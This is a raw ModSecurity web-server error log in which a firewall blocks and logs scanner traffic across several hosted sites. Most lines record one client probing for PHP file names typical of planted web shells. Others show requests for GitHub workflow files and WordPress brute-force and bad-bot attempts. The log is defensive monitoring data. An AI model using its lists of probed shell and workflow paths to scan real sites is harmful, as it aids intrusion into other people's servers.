[Tue May 26 18:45:52.772083 2026] [security2:error] [pid 1025417:tid 1025554] [client 4.204.220.190:26766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/samll.php"] [unique_id "ahWdCFHbArxonFeMXvQYwQAAAAc"]
[Tue May 26 18:45:52.772181 2026] [security2:error] [pid 1025417:tid 1025554] [client 4.204.220.190:26766] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/samll.php"] [unique_id "ahWdCFHbArxonFeMXvQYwQAAAAc"]
[Tue May 26 18:45:53.086922 2026] [security2:error] [pid 1025417:tid 1025596] [client 4.204.220.190:49537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/ingfo.php"] [unique_id "ahWdCVHbArxonFeMXvQYxQAAADE"]
[Tue May 26 18:45:53.087028 2026] [security2:error] [pid 1025417:tid 1025596] [client 4.204.220.190:49537] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/ingfo.php"] [unique_id "ahWdCVHbArxonFeMXvQYxQAAADE"]
[Tue May 26 18:45:53.227463 2026] [security2:error] [pid 1025417:tid 1025515] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.github/workflows/build.yaml"] [unique_id "ahWdCVHbArxonFeMXvQY0gAAI2E"]
[Tue May 26 18:45:53.229817 2026] [security2:error] [pid 1025417:tid 1025656] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdCFHbArxonFeMXvQYxAAAAG0"]
[Tue May 26 18:45:53.363313 2026] [security2:error] [pid 1025417:tid 1025668] [client 4.204.220.190:16714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/c55cdler.php"] [unique_id "ahWdCVHbArxonFeMXvQY1QAAAHk"]
[Tue May 26 18:45:53.363423 2026] [security2:error] [pid 1025417:tid 1025668] [client 4.204.220.190:16714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/c55cdler.php"] [unique_id "ahWdCVHbArxonFeMXvQY1QAAAHk"]
[Tue May 26 18:45:53.683000 2026] [security2:error] [pid 1025417:tid 1025570] [client 4.204.220.190:34299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/error_log.php"] [unique_id "ahWdCVHbArxonFeMXvQY4AAAABc"]
[Tue May 26 18:45:53.683101 2026] [security2:error] [pid 1025417:tid 1025570] [client 4.204.220.190:34299] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/error_log.php"] [unique_id "ahWdCVHbArxonFeMXvQY4AAAABc"]
[Tue May 26 18:45:54.121227 2026] [security2:error] [pid 1025417:tid 1025618] [client 4.204.220.190:33103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/xenon1337.php"] [unique_id "ahWdClHbArxonFeMXvQY7QAAAEc"]
[Tue May 26 18:45:54.121365 2026] [security2:error] [pid 1025417:tid 1025618] [client 4.204.220.190:33103] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/xenon1337.php"] [unique_id "ahWdClHbArxonFeMXvQY7QAAAEc"]
[Tue May 26 18:45:54.570335 2026] [security2:error] [pid 1025417:tid 1025645] [client 4.204.220.190:26800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/alfa403.php"] [unique_id "ahWdClHbArxonFeMXvQY-AAAAGI"]
[Tue May 26 18:45:54.570449 2026] [security2:error] [pid 1025417:tid 1025645] [client 4.204.220.190:26800] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/alfa403.php"] [unique_id "ahWdClHbArxonFeMXvQY-AAAAGI"]
[Tue May 26 18:45:54.762339 2026] [security2:error] [pid 1025417:tid 1025596] [client 4.204.220.190:28451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/test11.php"] [unique_id "ahWdClHbArxonFeMXvQY_wAAADE"]
[Tue May 26 18:45:54.762481 2026] [security2:error] [pid 1025417:tid 1025596] [client 4.204.220.190:28451] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/test11.php"] [unique_id "ahWdClHbArxonFeMXvQY_wAAADE"]
[Tue May 26 18:45:55.063373 2026] [security2:error] [pid 1025417:tid 1025656] [client 4.204.220.190:30099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/koala.php"] [unique_id "ahWdC1HbArxonFeMXvQZBgAAAG0"]
[Tue May 26 18:45:55.063496 2026] [security2:error] [pid 1025417:tid 1025656] [client 4.204.220.190:30099] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/koala.php"] [unique_id "ahWdC1HbArxonFeMXvQZBgAAAG0"]
[Tue May 26 18:45:55.160249 2026] [security2:error] [pid 1025417:tid 1025521] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.github/workflows/build.yml"] [unique_id "ahWdC1HbArxonFeMXvQZBwAAP2c"]
[Tue May 26 18:45:55.282083 2026] [security2:error] [pid 1025417:tid 1025631] [client 4.204.220.190:30101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/mac.php"] [unique_id "ahWdC1HbArxonFeMXvQZDgAAAFQ"]
[Tue May 26 18:45:55.282193 2026] [security2:error] [pid 1025417:tid 1025631] [client 4.204.220.190:30101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/mac.php"] [unique_id "ahWdC1HbArxonFeMXvQZDgAAAFQ"]
[Tue May 26 18:45:55.797474 2026] [security2:error] [pid 1025417:tid 1025577] [client 4.204.220.190:16747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahWdC1HbArxonFeMXvQZKAAAAB4"]
[Tue May 26 18:45:55.797584 2026] [security2:error] [pid 1025417:tid 1025577] [client 4.204.220.190:16747] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahWdC1HbArxonFeMXvQZKAAAAB4"]
[Tue May 26 18:45:55.872300 2026] [security2:error] [pid 1025417:tid 1025669] [client 94.31.109.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdC1HbArxonFeMXvQZGgAAAHo"]
[Tue May 26 18:45:55.954369 2026] [security2:error] [pid 1025417:tid 1025547] [client 52.7.141.1:58274] ModSecurity: Warning. Matched phrase "Siteimprove" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahWdClHbArxonFeMXvQY9AAAAAA"]
[Tue May 26 18:45:56.305234 2026] [security2:error] [pid 1025417:tid 1025599] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdC1HbArxonFeMXvQZLwAAADQ"]
[Tue May 26 18:45:56.717570 2026] [security2:error] [pid 1025417:tid 1025659] [client 4.204.220.190:34300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wefile.php"] [unique_id "ahWdDFHbArxonFeMXvQZSgAAAHA"]
[Tue May 26 18:45:56.717714 2026] [security2:error] [pid 1025417:tid 1025659] [client 4.204.220.190:34300] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/wefile.php"] [unique_id "ahWdDFHbArxonFeMXvQZSgAAAHA"]
[Tue May 26 18:45:57.041983 2026] [security2:error] [pid 1025417:tid 1025525] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.github/workflows/ci.yaml"] [unique_id "ahWdDVHbArxonFeMXvQZVwAATWs"]
[Tue May 26 18:45:57.294084 2026] [security2:error] [pid 1025417:tid 1025652] [client 4.204.220.190:32412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/casp3.php"] [unique_id "ahWdDVHbArxonFeMXvQZWwAAAGk"]
[Tue May 26 18:45:57.294206 2026] [security2:error] [pid 1025417:tid 1025652] [client 4.204.220.190:32412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/casp3.php"] [unique_id "ahWdDVHbArxonFeMXvQZWwAAAGk"]
[Tue May 26 18:45:58.014894 2026] [security2:error] [pid 1025417:tid 1025579] [client 104.28.163.39:13346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.163.28.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jkjuice.com"] [uri "/wp-login.php"] [unique_id "ahWdDVHbArxonFeMXvQZZQAAACA"]
[Tue May 26 18:45:58.113395 2026] [security2:error] [pid 1025417:tid 1025572] [client 4.204.220.190:46544] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWdDlHbArxonFeMXvQZeQAAABk"]
[Tue May 26 18:45:58.288849 2026] [security2:error] [pid 1025417:tid 1025538] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdDlHbArxonFeMXvQZfgAARng"]
[Tue May 26 18:45:58.289055 2026] [security2:error] [pid 1025417:tid 1025617] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdDlHbArxonFeMXvQZfgAARng"]
[Tue May 26 18:45:58.416345 2026] [security2:error] [pid 1025417:tid 1025597] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdDlHbArxonFeMXvQZhAAAADI"]
[Tue May 26 18:45:58.432180 2026] [security2:error] [pid 1025417:tid 1025631] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdDVHbArxonFeMXvQZeAAAAFQ"]
[Tue May 26 18:45:58.491321 2026] [security2:error] [pid 1025417:tid 1025668] [client 4.204.220.190:46544] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-admin/js/"] [unique_id "ahWdDlHbArxonFeMXvQZiAAAAHk"]
[Tue May 26 18:45:58.575399 2026] [security2:error] [pid 1025417:tid 1025594] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdDlHbArxonFeMXvQZiQAAAC8"]
[Tue May 26 18:45:58.647410 2026] [security2:error] [pid 1025417:tid 1025658] [client 4.204.220.190:46544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWdDlHbArxonFeMXvQZjQAAAG8"]
[Tue May 26 18:45:58.647526 2026] [security2:error] [pid 1025417:tid 1025658] [client 4.204.220.190:46544] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWdDlHbArxonFeMXvQZjQAAAG8"]
[Tue May 26 18:45:58.928651 2026] [security2:error] [pid 1025417:tid 1025536] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.github/workflows/ci.yml"] [unique_id "ahWdDlHbArxonFeMXvQZmQAAW3Y"]
[Tue May 26 18:45:59.227240 2026] [security2:error] [pid 1025417:tid 1025583] [client 4.204.220.190:28420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/half.php"] [unique_id "ahWdD1HbArxonFeMXvQZnAAAACQ"]
[Tue May 26 18:45:59.227344 2026] [security2:error] [pid 1025417:tid 1025583] [client 4.204.220.190:28420] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/half.php"] [unique_id "ahWdD1HbArxonFeMXvQZnAAAACQ"]
[Tue May 26 18:45:59.329720 2026] [security2:error] [pid 1025417:tid 1025560] [client 198.244.242.230:51236] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.ivwellnessresources.org"] [uri "/robots.txt"] [unique_id "ahWdD1HbArxonFeMXvQZnwAAAA0"]
[Tue May 26 18:45:59.329883 2026] [security2:error] [pid 1025417:tid 1025560] [client 198.244.242.230:51236] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ivwellnessresources.org"] [uri "/robots.txt"] [unique_id "ahWdD1HbArxonFeMXvQZnwAAAA0"]
[Tue May 26 18:45:59.611635 2026] [security2:error] [pid 1025417:tid 1025578] [client 4.204.220.190:16676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/2P.php"] [unique_id "ahWdD1HbArxonFeMXvQZsgAAAB8"]
[Tue May 26 18:45:59.611740 2026] [security2:error] [pid 1025417:tid 1025578] [client 4.204.220.190:16676] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/2P.php"] [unique_id "ahWdD1HbArxonFeMXvQZsgAAAB8"]
[Tue May 26 18:45:59.656960 2026] [security2:error] [pid 1025417:tid 1025599] [client 157.7.188.122:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWdD1HbArxonFeMXvQZqgAAADQ"]
[Tue May 26 18:45:59.670210 2026] [security2:error] [pid 1025417:tid 1025669] [client 157.7.188.122:53822] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahWdD1HbArxonFeMXvQZpgAAAHo"]
[Tue May 26 18:45:59.674864 2026] [security2:error] [pid 1025417:tid 1025616] [client 157.7.188.122:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWdD1HbArxonFeMXvQZqwAAAEU"]
[Tue May 26 18:45:59.679290 2026] [security2:error] [pid 1025417:tid 1025627] [client 157.7.188.122:53818] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahWdD1HbArxonFeMXvQZpwAAAFA"]
[Tue May 26 18:45:59.698418 2026] [security2:error] [pid 1025417:tid 1025579] [client 157.7.188.122:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWdD1HbArxonFeMXvQZrgAAACA"]
[Tue May 26 18:45:59.699090 2026] [security2:error] [pid 1025417:tid 1025626] [client 157.7.188.122:53820] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahWdD1HbArxonFeMXvQZrAAAAE8"]
[Tue May 26 18:45:59.858572 2026] [security2:error] [pid 1025417:tid 1025659] [client 4.204.220.190:26758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/tires.php"] [unique_id "ahWdD1HbArxonFeMXvQZuAAAAHA"]
[Tue May 26 18:45:59.858705 2026] [security2:error] [pid 1025417:tid 1025659] [client 4.204.220.190:26758] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/tires.php"] [unique_id "ahWdD1HbArxonFeMXvQZuAAAAHA"]
[Tue May 26 18:46:00.101410 2026] [security2:error] [pid 1025417:tid 1025585] [client 4.204.220.190:30138] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWdEFHbArxonFeMXvQZwAAAACY"]
[Tue May 26 18:46:00.176772 2026] [security2:error] [pid 1025417:tid 1025571] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdEFHbArxonFeMXvQZxQAAABg"]
[Tue May 26 18:46:00.285191 2026] [security2:error] [pid 1025417:tid 1025422] [remote 121.200.216.55:55612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdEFHbArxonFeMXvQZvwAAAAQ"]
[Tue May 26 18:46:00.332674 2026] [security2:error] [pid 1025417:tid 1025609] [client 4.204.220.190:30138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/like.php"] [unique_id "ahWdEFHbArxonFeMXvQZxgAAAD4"]
[Tue May 26 18:46:00.332777 2026] [security2:error] [pid 1025417:tid 1025609] [client 4.204.220.190:30138] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/like.php"] [unique_id "ahWdEFHbArxonFeMXvQZxgAAAD4"]
[Tue May 26 18:46:00.508795 2026] [security2:error] [pid 1025417:tid 1025604] [client 162.243.41.33:63154] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWdEFHbArxonFeMXvQZ0QAAADk"]
[Tue May 26 18:46:00.523697 2026] [security2:error] [pid 1025417:tid 1025646] [client 157.7.188.122:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/wp-content/cache/speedycache/www.cagmedya.com/all/index.html"] [unique_id "ahWdEFHbArxonFeMXvQZ2QAAAB0"]
[Tue May 26 18:46:00.527787 2026] [security2:error] [pid 1025417:tid 1025637] [client 157.7.188.122:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/wp-content/cache/speedycache/www.cagmedya.com/all/index.html"] [unique_id "ahWdEFHbArxonFeMXvQZ2wAAAHg"]
